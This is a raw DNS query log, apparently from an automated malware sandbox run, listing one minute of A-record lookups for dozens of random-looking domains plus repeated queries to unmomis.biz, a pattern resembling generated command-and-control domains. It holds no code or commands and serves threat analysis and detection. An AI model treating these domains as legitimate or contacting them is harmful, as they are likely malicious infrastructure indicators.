                                                                                                                                                                    Sep 7, 2024 15:35:10.666281939 CEST192.168.2.121.1.1.10xa4b6Standard query (0)abnjquztpqm.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:11.321866989 CEST192.168.2.121.1.1.10x9e9dStandard query (0)ukwwmdkmjhssi.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:11.962591887 CEST192.168.2.121.1.1.10xf1c6Standard query (0)isimmewo.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:12.272749901 CEST192.168.2.121.1.1.10x56adStandard query (0)pryyadpsi.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:12.525248051 CEST192.168.2.121.1.1.10x56adStandard query (0)pryyadpsi.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:13.526484966 CEST192.168.2.121.1.1.10x7020Standard query (0)wwwxruiqiwwui.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:13.698259115 CEST192.168.2.121.1.1.10xed9aStandard query (0)imgigawgcbb.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:13.947030067 CEST192.168.2.121.1.1.10xed9aStandard query (0)imgigawgcbb.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:14.322953939 CEST192.168.2.121.1.1.10x7ae3Standard query (0)msyggec.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:14.962526083 CEST192.168.2.121.1.1.10xc473Standard query (0)cyqameobiaocc.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:15.227695942 CEST192.168.2.121.1.1.10xc473Standard query (0)cyqameobiaocc.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:15.384608030 CEST192.168.2.121.1.1.10xc210Standard query (0)miadmzfsebr.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:15.510337114 CEST192.168.2.121.1.1.10x8898Standard query (0)qeuseerno.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:16.149940968 CEST192.168.2.121.1.1.10x1a4fStandard query (0)nqojfmslwe.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:16.433770895 CEST192.168.2.121.1.1.10x4c5cStandard query (0)wcbwtkgk.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:16.587832928 CEST192.168.2.121.1.1.10x7f44Standard query (0)qssjkviqegq.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:16.853420973 CEST192.168.2.121.1.1.10x7f44Standard query (0)qssjkviqegq.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:16.963119030 CEST192.168.2.121.1.1.10xf2c8Standard query (0)aqawxautkwe.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:17.243756056 CEST192.168.2.121.1.1.10x95acStandard query (0)osncsnldo.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:17.493710995 CEST192.168.2.121.1.1.10x95acStandard query (0)osncsnldo.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:17.619394064 CEST192.168.2.121.1.1.10x9a81Standard query (0)kbrky.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:17.806332111 CEST192.168.2.121.1.1.10x7a9dStandard query (0)rosumuutscjkl.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:18.494635105 CEST192.168.2.121.1.1.10xd32cStandard query (0)swgmuxkigyz.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:18.681408882 CEST192.168.2.121.1.1.10xd78Standard query (0)gboawkflmif.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:18.946646929 CEST192.168.2.121.1.1.10xd78Standard query (0)gboawkflmif.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:19.074436903 CEST192.168.2.121.1.1.10xd115Standard query (0)qchscc.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:19.712665081 CEST192.168.2.121.1.1.10x688aStandard query (0)tjmgkenb.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:20.321870089 CEST192.168.2.121.1.1.10x6644Standard query (0)mdworuiagzuyu.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:20.464092016 CEST192.168.2.121.1.1.10x778eStandard query (0)cbhndeyqekyip.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:20.785552025 CEST192.168.2.121.1.1.10x778eStandard query (0)cbhndeyqekyip.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:20.904212952 CEST192.168.2.121.1.1.10x5435Standard query (0)gskjky.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:21.120719910 CEST192.168.2.121.1.1.10x3f6aStandard query (0)hsimqqsmgep.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:21.400269985 CEST192.168.2.121.1.1.10x5dd2Standard query (0)uwqmeua.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:21.649713993 CEST192.168.2.121.1.1.10x5dd2Standard query (0)uwqmeua.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:22.635024071 CEST192.168.2.121.1.1.10x5ad7Standard query (0)qfgsihuk.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:22.853714943 CEST192.168.2.121.1.1.10x810bStandard query (0)wwyguweyegqlm.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:23.102865934 CEST192.168.2.121.1.1.10x810bStandard query (0)wwyguweyegqlm.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:23.540707111 CEST192.168.2.121.1.1.10x1e13Standard query (0)zovbuc.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:23.853370905 CEST192.168.2.121.1.1.10x6143Standard query (0)keqou.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:23.979125023 CEST192.168.2.121.1.1.10x8a4cStandard query (0)givyubk.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:24.260108948 CEST192.168.2.121.1.1.10xf110Standard query (0)sjyjvkyfhu.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:24.900091887 CEST192.168.2.121.1.1.10x6a03Standard query (0)ivhmikwm.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:25.025074959 CEST192.168.2.121.1.1.10xc702Standard query (0)diebgaccm.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:25.150311947 CEST192.168.2.121.1.1.10x1d8eStandard query (0)cwfrm.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:25.447468042 CEST192.168.2.121.1.1.10xe330Standard query (0)imkhxwgiovl.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:25.712173939 CEST192.168.2.121.1.1.10xe330Standard query (0)imkhxwgiovl.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:25.822356939 CEST192.168.2.121.1.1.10x77eStandard query (0)kgskfwu.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:26.103312969 CEST192.168.2.121.1.1.10xa07fStandard query (0)oygxiuecuvg.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:26.370285034 CEST192.168.2.121.1.1.10xa07fStandard query (0)oygxiuecuvg.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:26.790762901 CEST192.168.2.121.1.1.10x79b1Standard query (0)vrqnkly.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:26.947216034 CEST192.168.2.121.1.1.10x810aStandard query (0)bcwihlwez.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:27.571850061 CEST192.168.2.121.1.1.10x5dd9Standard query (0)pnpabkjjdjmoh.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:27.837138891 CEST192.168.2.121.1.1.10x5dd9Standard query (0)pnpabkjjdjmoh.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:28.259440899 CEST192.168.2.121.1.1.10x58b4Standard query (0)abarzsxjgiu.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:28.900022984 CEST192.168.2.121.1.1.10x4f59Standard query (0)zqoqkmmeeti.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:29.118954897 CEST192.168.2.121.1.1.10xc277Standard query (0)qjccwqk.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:29.306612968 CEST192.168.2.121.1.1.10x2ef4Standard query (0)uokosacni.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:29.440164089 CEST192.168.2.121.1.1.10xfa8aStandard query (0)eisqrmysyxcbwk.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:30.103127956 CEST192.168.2.121.1.1.10xa3eaStandard query (0)ivazy.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:30.368815899 CEST192.168.2.121.1.1.10x2cdeStandard query (0)dbjknzsejmi.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:30.494149923 CEST192.168.2.121.1.1.10x3f58Standard query (0)amgycq.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:31.181339025 CEST192.168.2.121.1.1.10x717Standard query (0)sclqexyj.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:31.994482040 CEST192.168.2.121.1.1.10x275cStandard query (0)boresaucqwsns.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:32.213232994 CEST192.168.2.121.1.1.10x3d1cStandard query (0)avvooma.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:32.462179899 CEST192.168.2.121.1.1.10x3d1cStandard query (0)avvooma.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:32.666407108 CEST192.168.2.121.1.1.10x2c95Standard query (0)ygjcqkdytoovic.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:32.918399096 CEST192.168.2.121.1.1.10x2c95Standard query (0)ygjcqkdytoovic.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:33.025609016 CEST192.168.2.121.1.1.10x1044Standard query (0)ktogxvlkiikq.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:33.167113066 CEST192.168.2.121.1.1.10xfe51Standard query (0)nkybaqmk.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:33.291832924 CEST192.168.2.121.1.1.10x3373Standard query (0)viaqugucdom.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:33.931359053 CEST192.168.2.121.1.1.10x9350Standard query (0)mydendkyepm.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:34.072535992 CEST192.168.2.121.1.1.10xfd87Standard query (0)kiuetkhruas.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:34.230900049 CEST192.168.2.121.1.1.10xbbe3Standard query (0)uwyojch.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:34.510102987 CEST192.168.2.121.1.1.10x1cbeStandard query (0)iagyhtrsme.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:34.790637970 CEST192.168.2.121.1.1.10x3c25Standard query (0)wotywuy.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:35.136015892 CEST192.168.2.121.1.1.10x50c7Standard query (0)mciauanqhxoyxe.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:35.759721041 CEST192.168.2.121.1.1.10xbfd3Standard query (0)yvfms.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:36.041043043 CEST192.168.2.121.1.1.10x9406Standard query (0)ymrqaea.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:36.165752888 CEST192.168.2.121.1.1.10x235bStandard query (0)rmzasmmun.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:36.821948051 CEST192.168.2.121.1.1.10xbda2Standard query (0)suamwbesqi.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:37.446933985 CEST192.168.2.121.1.1.10x2bd5Standard query (0)lkfor.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:37.728257895 CEST192.168.2.121.1.1.10x3f17Standard query (0)uiwloxy.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:38.353080988 CEST192.168.2.121.1.1.10x4e8dStandard query (0)rcouaebwmkyiu.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:39.009394884 CEST192.168.2.121.1.1.10xb75bStandard query (0)iayhpanmulmam.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:39.137002945 CEST192.168.2.121.1.1.10x3c6eStandard query (0)sekohlmoeb.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:39.775007010 CEST192.168.2.121.1.1.10xc740Standard query (0)ryzqoaeow.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:40.060039043 CEST192.168.2.121.1.1.10x311bStandard query (0)iuccdeuiyoexn.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:40.696880102 CEST192.168.2.121.1.1.10x3c6eStandard query (0)uydizwmbxqveu.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:40.884918928 CEST192.168.2.121.1.1.10xfb75Standard query (0)qgpfqqgedee.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:41.149852991 CEST192.168.2.121.1.1.10xfb75Standard query (0)qgpfqqgedee.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:41.306548119 CEST192.168.2.121.1.1.10xf40cStandard query (0)wqegehxiy.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:41.464982986 CEST192.168.2.121.1.1.10x5b19Standard query (0)ywcgispye.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:42.103144884 CEST192.168.2.121.1.1.10xb14dStandard query (0)lurysaenwgwrl.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:42.728231907 CEST192.168.2.121.1.1.10x70e6Standard query (0)zsklocek.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:42.993511915 CEST192.168.2.121.1.1.10x70e6Standard query (0)zsklocek.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:43.118833065 CEST192.168.2.121.1.1.10x1ae6Standard query (0)ymesqmmzqaq.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:43.244333982 CEST192.168.2.121.1.1.10xb3f4Standard query (0)ybodqneqo.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:43.371757984 CEST192.168.2.121.1.1.10xc74aStandard query (0)owqffjics.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:43.994155884 CEST192.168.2.121.1.1.10x3e9eStandard query (0)mkqoc.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:44.634356976 CEST192.168.2.121.1.1.10xf089Standard query (0)fdodpwquhqne.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:44.944983959 CEST192.168.2.121.1.1.10x69d7Standard query (0)smeygqiimwqlu.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:45.072033882 CEST192.168.2.121.1.1.10xbbc1Standard query (0)ccqqq.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:45.276259899 CEST192.168.2.121.1.1.10x3729Standard query (0)qqxashige.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:45.558948040 CEST192.168.2.121.1.1.10x664eStandard query (0)soqywigqyan.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:45.806423903 CEST192.168.2.121.1.1.10x664eStandard query (0)soqywigqyan.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:46.760076046 CEST192.168.2.121.1.1.10x1ab5Standard query (0)bvrqckeockhzm.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:47.056442976 CEST192.168.2.121.1.1.10x30b4Standard query (0)dalpkolwqukmw.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:47.181288958 CEST192.168.2.121.1.1.10x564bStandard query (0)grohcawaiqg.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:47.431282997 CEST192.168.2.121.1.1.10x564bStandard query (0)grohcawaiqg.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:48.743702888 CEST192.168.2.121.1.1.10x9f69Standard query (0)wabmtae.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:48.884751081 CEST192.168.2.121.1.1.10x263bStandard query (0)wcuauomwf.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:49.150202036 CEST192.168.2.121.1.1.10x5f05Standard query (0)syshiqgwg.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:49.275316000 CEST192.168.2.121.1.1.10x3461Standard query (0)pyytqfuq.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:49.400343895 CEST192.168.2.121.1.1.10xbeceStandard query (0)jbohmpisfz.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:49.603820086 CEST192.168.2.121.1.1.10xc928Standard query (0)wmwiqhwgmqw.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:49.775298119 CEST192.168.2.121.1.1.10x117fStandard query (0)uwkoaveeq.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:49.806227922 CEST192.168.2.121.1.1.10x2799Standard query (0)unmomis.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:49.946973085 CEST192.168.2.121.1.1.10xfff9Standard query (0)ouuhxcrgcyy.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:50.071795940 CEST192.168.2.121.1.1.10x14acStandard query (0)nkuocyaog.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:50.197386026 CEST192.168.2.121.1.1.10x76aeStandard query (0)uuymqeexwuvmc.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:50.478877068 CEST192.168.2.121.1.1.10x79b3Standard query (0)cvhey.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:50.635929108 CEST192.168.2.121.1.1.10xc767Standard query (0)qnfqcqeya.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:50.916297913 CEST192.168.2.121.1.1.10xa91Standard query (0)grcqgnm.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:51.040560961 CEST192.168.2.121.1.1.10x167bStandard query (0)obimmmqoei.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:51.166335106 CEST192.168.2.121.1.1.10xe402Standard query (0)qqrsykcalst.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:51.290633917 CEST192.168.2.121.1.1.10x72c6Standard query (0)sjxrkruqiwx.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:51.401626110 CEST192.168.2.121.1.1.10x7eb9Standard query (0)xuuussa.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:51.525007963 CEST192.168.2.121.1.1.10x7b7eStandard query (0)seegjkcft.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:51.681396961 CEST192.168.2.121.1.1.10x6bb0Standard query (0)akraytmevnp.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:51.791438103 CEST192.168.2.121.1.1.10x1f6Standard query (0)gdoiuts.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:51.915570021 CEST192.168.2.121.1.1.10x53a1Standard query (0)veimagu.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:52.056229115 CEST192.168.2.121.1.1.10x21fdStandard query (0)eekwkxxiiiz.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:52.400233030 CEST192.168.2.121.1.1.10x4f91Standard query (0)qsiweimlofr.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:52.542329073 CEST192.168.2.121.1.1.10x591cStandard query (0)owurg.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:52.844832897 CEST192.168.2.121.1.1.10x2017Standard query (0)ohpwkzyfepd.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:52.978092909 CEST192.168.2.121.1.1.10x4038Standard query (0)ugskus.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:53.120228052 CEST192.168.2.121.1.1.10x7224Standard query (0)muwgqklnv.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:53.274991035 CEST192.168.2.121.1.1.10xfe1aStandard query (0)ohplikpbqm.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:53.634347916 CEST192.168.2.121.1.1.10x2bd9Standard query (0)ebysmjzss.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:53.760731936 CEST192.168.2.121.1.1.10x12f2Standard query (0)eykewokzuisiy.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:53.914078951 CEST192.168.2.121.1.1.10x7734Standard query (0)yiiaezr.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:54.153160095 CEST192.168.2.121.1.1.10x7734Standard query (0)yiiaezr.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:55.478205919 CEST192.168.2.121.1.1.10xff28Standard query (0)uoswgwkemkmcc.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:55.587601900 CEST192.168.2.121.1.1.10xdefeStandard query (0)oeceusfh.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:55.730093002 CEST192.168.2.121.1.1.10xa098Standard query (0)zugeqigimyaqo.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:55.775269985 CEST192.168.2.121.1.1.10x78bbStandard query (0)unmomis.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:55.884654999 CEST192.168.2.121.1.1.10x27c8Standard query (0)eyyug.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:56.057131052 CEST192.168.2.121.1.1.10x4909Standard query (0)gmixucavlum.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:56.183131933 CEST192.168.2.121.1.1.10x7588Standard query (0)isodqbkga.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:56.310973883 CEST192.168.2.121.1.1.10xea80Standard query (0)semqxvomsaiyc.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:56.618885040 CEST192.168.2.121.1.1.10xbb6dStandard query (0)ieozc.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:56.776949883 CEST192.168.2.121.1.1.10xa93Standard query (0)myuoinjtbcc.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:56.886908054 CEST192.168.2.121.1.1.10x1674Standard query (0)mixmcg.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:57.024210930 CEST192.168.2.121.1.1.10xd80Standard query (0)mrguvc.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:57.165712118 CEST192.168.2.121.1.1.10x4ec7Standard query (0)slrszlggkko.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:57.290833950 CEST192.168.2.121.1.1.10xa2eStandard query (0)csttjesex.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:57.605288029 CEST192.168.2.121.1.1.10xc8ceStandard query (0)lfdwova.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:57.743746042 CEST192.168.2.121.1.1.10xcb8bStandard query (0)pbwsw.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:58.009339094 CEST192.168.2.121.1.1.10x5aa6Standard query (0)yvvacoyibzswp.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:58.149992943 CEST192.168.2.121.1.1.10x3665Standard query (0)cwmewmakbji.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:58.415174007 CEST192.168.2.121.1.1.10x3665Standard query (0)cwmewmakbji.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:58.540618896 CEST192.168.2.121.1.1.10x8e86Standard query (0)dqkfw.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:58.743705034 CEST192.168.2.121.1.1.10x2667Standard query (0)nqfwvdafruwtc.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:59.009560108 CEST192.168.2.121.1.1.10xd36eStandard query (0)uchsqlwgl.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:59.137320995 CEST192.168.2.121.1.1.10xe711Standard query (0)ecwuuezii.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:59.384094000 CEST192.168.2.121.1.1.10xe711Standard query (0)ecwuuezii.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:59.509807110 CEST192.168.2.121.1.1.10xe8c8Standard query (0)ukqeptcoskosl.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:59.634335995 CEST192.168.2.121.1.1.10x7f55Standard query (0)eqakpjqogygch.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:35:59.899585962 CEST192.168.2.121.1.1.10x7f55Standard query (0)eqakpjqogygch.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:00.056437969 CEST192.168.2.121.1.1.10x4905Standard query (0)osoiuss.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:00.181278944 CEST192.168.2.121.1.1.10xef28Standard query (0)yyeuqepeog.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:00.290657043 CEST192.168.2.121.1.1.10xc1f7Standard query (0)ixiublhmiz.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:00.556337118 CEST192.168.2.121.1.1.10xd6c1Standard query (0)emomhyu.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:00.666702032 CEST192.168.2.121.1.1.10xddd4Standard query (0)knocusmocaqfuo.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:00.684715033 CEST192.168.2.121.1.1.10x3c90Standard query (0)unmomis.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:00.790605068 CEST192.168.2.121.1.1.10x857fStandard query (0)pakgv.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:01.088345051 CEST192.168.2.121.1.1.10x4c45Standard query (0)iemgeeyosqv.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:01.197067976 CEST192.168.2.121.1.1.10x9940Standard query (0)huvzylm.krA (IP address)IN (0x0001)false
